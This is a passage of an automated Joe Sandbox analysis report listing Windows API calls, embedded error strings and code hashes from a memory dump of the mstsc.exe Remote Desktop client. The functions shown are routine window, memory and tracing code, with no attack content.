                                                                                                                                                                                        • Instruction ID: 83db99e1c41c346dc850c6770471f62ea43acaa7a28faab1254eaf330a6d00a0
                                                                                                                                                                                        • Opcode Fuzzy Hash: b45a17da472640dc02c6cfb444cce352bf9413370e4af541616426b231bfc269
                                                                                                                                                                                        • Instruction Fuzzy Hash: D631F131604308AFEB6DEFA4CC49FAA77B9AB44304F00049AF505D71E2DA34EE44CB52
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0092BB5D
                                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0092BB0F), ref: 0092BB79
                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0092BBB3
                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0092BBBB
                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,0092BB0F), ref: 0092BBC8
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Free$String$??3@CloseHandleLibrary
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 122121376-0
                                                                                                                                                                                        • Opcode ID: b2377952ae814678c1bc6e74d3964c57fd02bc4f63c63dcf6fcc582e78d22316
                                                                                                                                                                                        • Instruction ID: c9d0ad13e8399e4daba550c46772b22861e702594c0ea5411dc6f47b4a0a027e
                                                                                                                                                                                        • Opcode Fuzzy Hash: b2377952ae814678c1bc6e74d3964c57fd02bc4f63c63dcf6fcc582e78d22316
                                                                                                                                                                                        • Instruction Fuzzy Hash: 30311CB4601B16EFC7188F66D988A55FBE8FF09315754422EE529C7B24CB71E864CF80
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • malloc.MSVCRT ref: 00917B2F
                                                                                                                                                                                        • free.MSVCRT ref: 00917B8F
                                                                                                                                                                                        • memcpy.MSVCRT(00000000,?,?), ref: 00917BB6
                                                                                                                                                                                          • Part of subcall function 00934E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0093A020,00000000,00000000,00000000), ref: 00934E6E
                                                                                                                                                                                          • Part of subcall function 008DF9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,008D1728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,008DFBF2,008E396B), ref: 008DFA1C
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ActivityControlEventMessageTracefreemallocmemcpy
                                                                                                                                                                                        • String ID: alloc memory for m_PreAuthCookie$preAuthCookie
                                                                                                                                                                                        • API String ID: 3016499739-513349929
                                                                                                                                                                                        • Opcode ID: 4f1363496640b5595bf15051f0f401cdadd67c99a9ddfd9a19c9c0cfdeab2a52
                                                                                                                                                                                        • Instruction ID: 5578246bcdde17665bbda9d3ed9e8ceb9d97722264e5b3cc43725eaa7e24f207
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f1363496640b5595bf15051f0f401cdadd67c99a9ddfd9a19c9c0cfdeab2a52
                                                                                                                                                                                        • Instruction Fuzzy Hash: C5215A727483096BCB289F549C46F97B7BAFBC4320F140169F84587262DB35DC95CB91
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0090D9DD
                                                                                                                                                                                        • SendMessageW.USER32(?,00001127,00000000,0000F000), ref: 0090D9F6
                                                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0090DA1E
                                                                                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0090DA57
                                                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 0090DA68
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                                        • Opcode ID: 641e9e4c6fa42e22d2cccf52a300d0e20e2a043bcb0cda6a874277068c1bf3df
                                                                                                                                                                                        • Instruction ID: 3d165e8e0d6972bf2678d5d629852d66c2694aa2b227fad38d467f0d35c5cd12
                                                                                                                                                                                        • Opcode Fuzzy Hash: 641e9e4c6fa42e22d2cccf52a300d0e20e2a043bcb0cda6a874277068c1bf3df
                                                                                                                                                                                        • Instruction Fuzzy Hash: 40219031A02225BEDB258A698C41BEEBAA8FF04760F014125EA15AB2C0D671DD50CB94
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetDlgItem.USER32(?,0093A2E0), ref: 009070F6
                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00907107
                                                                                                                                                                                        • MapWindowPoints.USER32 ref: 00907116
                                                                                                                                                                                        • OffsetRect.USER32 ref: 00907125
                                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000005), ref: 00907139
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Window$Rect$ItemOffsetPoints
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3327997973-0
                                                                                                                                                                                        • Opcode ID: 190c4e4f53ea7747c307ca3aaac76710124e849fbc15e2cae1b4de34664e38b5
                                                                                                                                                                                        • Instruction ID: 08597915f3cb65f90f3f43cbe45153ebcc1faf0c6c169a84d91fbd0449225aef
                                                                                                                                                                                        • Opcode Fuzzy Hash: 190c4e4f53ea7747c307ca3aaac76710124e849fbc15e2cae1b4de34664e38b5
                                                                                                                                                                                        • Instruction Fuzzy Hash: D8117372908209AFDB119FE5DC49EBFBB7CEB49711F004425BA01E2150DB30A9129FA1
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetDlgItem.USER32(00000000,00000003), ref: 0092118C
                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0092119D
                                                                                                                                                                                        • MapWindowPoints.USER32 ref: 009211AE
                                                                                                                                                                                        • OffsetRect.USER32 ref: 009211BD
                                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000005,00000000,00000000,00000005), ref: 009211D1
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Window$Rect$ItemOffsetPoints
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3327997973-0
                                                                                                                                                                                        • Opcode ID: f6d12e1a60e767a96b84638ed4bf1c08aab8249b2bb1bb78cffded498ba18f46
                                                                                                                                                                                        • Instruction ID: 87bd325056ec95844d27e607d35c234cb4c8133f01b8a34aa15e29a47e29bdd7
                                                                                                                                                                                        • Opcode Fuzzy Hash: f6d12e1a60e767a96b84638ed4bf1c08aab8249b2bb1bb78cffded498ba18f46
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D1119B2604619ABDB01DFE4AD49AAABBBCEB08301F104425FA01A2151CB30A925DFA1
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Window$MessagePost$AsyncShow
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2010630944-0
                                                                                                                                                                                        • Opcode ID: 883b59deb26a51b4042dba16ab9940b211733f4c37b58b63e9ad14a7b51a2143
                                                                                                                                                                                        • Instruction ID: 8294829f9c3fd26b97f8e6cff2b55fed4f649c92b703e8c1e1c1811f02b0f36f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 883b59deb26a51b4042dba16ab9940b211733f4c37b58b63e9ad14a7b51a2143
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D012835215611AFC7209B19EC08E96BFA1FF49760B018050F6199B6B1CB22FC60DF90
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,008E4F5C,?,00000000), ref: 008E5A89
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E2C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000B,008E396B,00000004,00913BC2,00000004,00000000,?,00913BC2,008E396B,00000000,00000000,00000000), ref: 008E2C85
                                                                                                                                                                                        • DeleteFileW.KERNEL32(009391C0,?,?,?,?,?,?,008E4F5C,?,00000000), ref: 008E5B3F
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • Failed to start remote application, xrefs: 008E5AC7
                                                                                                                                                                                        • Invalid CopyData params, xrefs: 008E5B05
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: HandleModule$AddressDeleteFileFreeLibraryMessageProcTrace
                                                                                                                                                                                        • String ID: Failed to start remote application$Invalid CopyData params
                                                                                                                                                                                        • API String ID: 2091952702-75341140
                                                                                                                                                                                        • Opcode ID: 57aafc43d2ee424a1b9a7211f7cc50b701eb3f8a83996d42eb5a9d82f28a2899
                                                                                                                                                                                        • Instruction ID: 0bee7a1a0bdfffb133ff88dc1221e1595ab3756028959f1a6686db881f29e434
                                                                                                                                                                                        • Opcode Fuzzy Hash: 57aafc43d2ee424a1b9a7211f7cc50b701eb3f8a83996d42eb5a9d82f28a2899
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7541E336600B85AFDB298F5AD849F2A37A6FFC6318F154169F840CB2A1DB70DD409B61
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000004,00000080,00000000), ref: 009282DE
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,009281B1,?,00000000), ref: 009282EC
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • Unable to initialize file name from moniker!, xrefs: 00928206
                                                                                                                                                                                        • Failed to close file stream!, xrefs: 00928299
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressCreateErrorFileFreeHandleLastLibraryMessageModuleProcTrace
                                                                                                                                                                                        • String ID: Failed to close file stream!$Unable to initialize file name from moniker!
                                                                                                                                                                                        • API String ID: 3465984092-1650752352
                                                                                                                                                                                        • Opcode ID: ef5b8948245d637f0fec9b624ffd9eb40c40c0728f95a7839133da916f194d63
                                                                                                                                                                                        • Instruction ID: 99a0a4de7b6efbf5eb3c307fafe1e2a60eb2e696365250f68019ef1e45e85c0d
                                                                                                                                                                                        • Opcode Fuzzy Hash: ef5b8948245d637f0fec9b624ffd9eb40c40c0728f95a7839133da916f194d63
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C412432511760AFD728CF59E888F16BB98FB06B50F04015AF950D72A9CB70EC509F81
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ExtractIconW.SHELL32(?,00000440,00000000), ref: 008F294D
                                                                                                                                                                                        • LoadIconW.USER32 ref: 008F2960
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Icon$AddressExtractFreeHandleLibraryLoadMessageModuleProcTrace
                                                                                                                                                                                        • String ID: Icon File$Icon Index
                                                                                                                                                                                        • API String ID: 494351486-3007940515
                                                                                                                                                                                        • Opcode ID: 1b8711919b7a33e22ff0bab1a16b0f87e638322a44d1e12b160dc54c666273da
                                                                                                                                                                                        • Instruction ID: 7d7e9060b768c3121ce676d775f713e68b11b9b9fc3bb09abf3bfc81e714e0cb
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b8711919b7a33e22ff0bab1a16b0f87e638322a44d1e12b160dc54c666273da
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F41F3313147487FD7289F758C49F667B9AFB49314F040125FA40E72A2CBB4DC908B92
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CM_Get_DevNode_Registry_PropertyW.CFGMGR32(00000000,00000003,?,00000000,?,00000000,?,?,00000000,?,?,0090F51F,?,?), ref: 0090F3A8
                                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,0090F51F,?,?,?,?,?,?,0090F653,?,?,?), ref: 0090F3CC
                                                                                                                                                                                        • ??_V@YAXPAX@Z.MSVCRT(00000000,?,?,0090F51F,?,?,?,?,?,?,0090F653,?,?,?), ref: 0090F456
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Get_Node_PropertyRegistry_
                                                                                                                                                                                        • String ID: USB\Class_07
                                                                                                                                                                                        • API String ID: 4267041287-3744949717
                                                                                                                                                                                        • Opcode ID: 11b2d9008db862fc320002ecfbd1257d7ea8969ebc2d338842f854ef12f19d67
                                                                                                                                                                                        • Instruction ID: add729820cfc9cd990ddde9cadc599e30591a773ed834304349cf03ee43222d3
                                                                                                                                                                                        • Opcode Fuzzy Hash: 11b2d9008db862fc320002ecfbd1257d7ea8969ebc2d338842f854ef12f19d67
                                                                                                                                                                                        • Instruction Fuzzy Hash: A0314B72A001019FCB349F6898696BFB3ADEB44B54F594079DD06DB6D0EB318F41C780
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • TlsFree.KERNEL32(?,0093BAA0,00000000,?,0093611F,?,00000001,?,00000000,00000000,0093AF68,?,00000001,00000000), ref: 0093614C
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • Failed to unregister the timer window class, xrefs: 00936203
                                                                                                                                                                                        • Failed to terminate timer globals, xrefs: 00936183
                                                                                                                                                                                        • Failed to unregister the thread window class, xrefs: 009361C3
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Free
                                                                                                                                                                                        • String ID: Failed to terminate timer globals$Failed to unregister the thread window class$Failed to unregister the timer window class
                                                                                                                                                                                        • API String ID: 3978063606-2031851587
                                                                                                                                                                                        • Opcode ID: 703e1a3fdb4a93038280581b7066a96db7c9558f5f39efa0bfcbedb836159983
                                                                                                                                                                                        • Instruction ID: df8700ac2395974fa65c4ce7862926b4095c5fce53db0444d4808a321aaa6a8f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 703e1a3fdb4a93038280581b7066a96db7c9558f5f39efa0bfcbedb836159983
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3531D4316183807FEB299FA5ED49F2A3B9AFB89354F194458E540C61A2C770CC42EF52
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ??2@
                                                                                                                                                                                        • String ID: %s/%s$TERMSRV
                                                                                                                                                                                        • API String ID: 1033339047-1026481303
                                                                                                                                                                                        • Opcode ID: 85ef5ed3d933d498065298a8b7c82bde442b5c0d556c5047c1ea760048295bd0
                                                                                                                                                                                        • Instruction ID: a213761e04389145482ae00bbca4053b9849631e54f4f1b1065f1c86c7a2c106
                                                                                                                                                                                        • Opcode Fuzzy Hash: 85ef5ed3d933d498065298a8b7c82bde442b5c0d556c5047c1ea760048295bd0
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5321F6F3E08225ABCB3196D9580595FFAA8DBD5770F1542A6ED05E7340DA358E009A90
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000098,009235CA,00000000,00000000,?,?,0092399A,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0092434B
                                                                                                                                                                                        • _wcslwr.MSVCRT ref: 009243B7
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,0092399A,00000000,00000000,00000000,00000000,00000000,?,?,?,009235CA,00000000,00000000,-00000001), ref: 009243CA
                                                                                                                                                                                          • Part of subcall function 00934E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0093A020,00000000,00000000,00000000), ref: 00934E6E
                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Local$ActivityAllocControlEventFreeMessageTrace_wcslwr
                                                                                                                                                                                        • String ID: StringCchCopy failed!
                                                                                                                                                                                        • API String ID: 3261266422-2217176558
                                                                                                                                                                                        • Opcode ID: 8ae3617981ebfab641d5a407c8dc8c652d44723ba08f18d3bba5593230fe3642
                                                                                                                                                                                        • Instruction ID: 9946223b8e60ee08d29d5183c79a0d73374945b58e7393dcc291844d6851e74a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ae3617981ebfab641d5a407c8dc8c652d44723ba08f18d3bba5593230fe3642
                                                                                                                                                                                        • Instruction Fuzzy Hash: D6113A33204720ABC725DF54FD49F1BB7A9FB85725F10841DF648AA295CA70DC019B94
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetFocus.USER32(?,0092D9F3,00000081,?,?,00000000,00000000,?,0092D97E,00000081,?,?), ref: 0092EA52
                                                                                                                                                                                        • IsChild.USER32(000000FF,00000000,?,0092D9F3,00000081,?,?,00000000,00000000,?,0092D97E,00000081,?,?), ref: 0092EA5C
                                                                                                                                                                                        • SetFocus.USER32 ref: 0092EA69
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • m_spOleInPlaceActiveObject->GetWindow failed, xrefs: 0092EA2D
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Focus$AddressChildFreeHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                        • String ID: m_spOleInPlaceActiveObject->GetWindow failed
                                                                                                                                                                                        • API String ID: 3636661317-3056059153
                                                                                                                                                                                        • Opcode ID: da5dff932cb5d4d455ae5f99e9122d1ace490288e0939df6ba6df9f44335f6aa
                                                                                                                                                                                        • Instruction ID: 0b0dd96170291073709f41c1d9b8346a7db27d3310e529c95a15f9bc43e45a82
                                                                                                                                                                                        • Opcode Fuzzy Hash: da5dff932cb5d4d455ae5f99e9122d1ace490288e0939df6ba6df9f44335f6aa
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9811E072600324ABCB29CF69E889F6E7BA9FF45320F10405AF904DB260C631CD019BA5
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • MonitorFromWindow.USER32(?,00000000,?,?), ref: 0091BC00
                                                                                                                                                                                        • GetMonitorInfoW.USER32(00000000,00000028), ref: 0091BC0F
                                                                                                                                                                                        • CopyRect.USER32(00000000,?), ref: 0091BC1E
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Monitor$CopyFromInfoRectWindow
                                                                                                                                                                                        • String ID: (
                                                                                                                                                                                        • API String ID: 3650910003-3887548279
                                                                                                                                                                                        • Opcode ID: a4245ace9082bb8f57f960fad9d14c9452590c554f2738d49c38c74dcadde52c
                                                                                                                                                                                        • Instruction ID: 51c78454d30f3a7b59a85fe435f4f495b3a9057532f7b3a8fa479a831461fafd
                                                                                                                                                                                        • Opcode Fuzzy Hash: a4245ace9082bb8f57f960fad9d14c9452590c554f2738d49c38c74dcadde52c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 64F0FF72B00608ABD7109BB9AC08AFFF7BDDF48610B014869E905E7250EF30DD059BA1
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 008E795D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E2C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000B,008E396B,00000004,00913BC2,00000004,00000000,?,00913BC2,008E396B,00000000,00000000,00000000), ref: 008E2C85
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ??2@AddressFreeHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                        • String ID: CAxHostWnd$CreateExtension failed$OnPreCreateControl failed
                                                                                                                                                                                        • API String ID: 3058038507-92757506
                                                                                                                                                                                        • Opcode ID: 7d02f1d49b958bc006d2e92bae70265279cdb38b4b3fda05d7db822d307ed522
                                                                                                                                                                                        • Instruction ID: d855137756810de5c4dcd6f78acb0177e8fc1c28668ed6371d7ed8c4ead98802
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d02f1d49b958bc006d2e92bae70265279cdb38b4b3fda05d7db822d307ed522
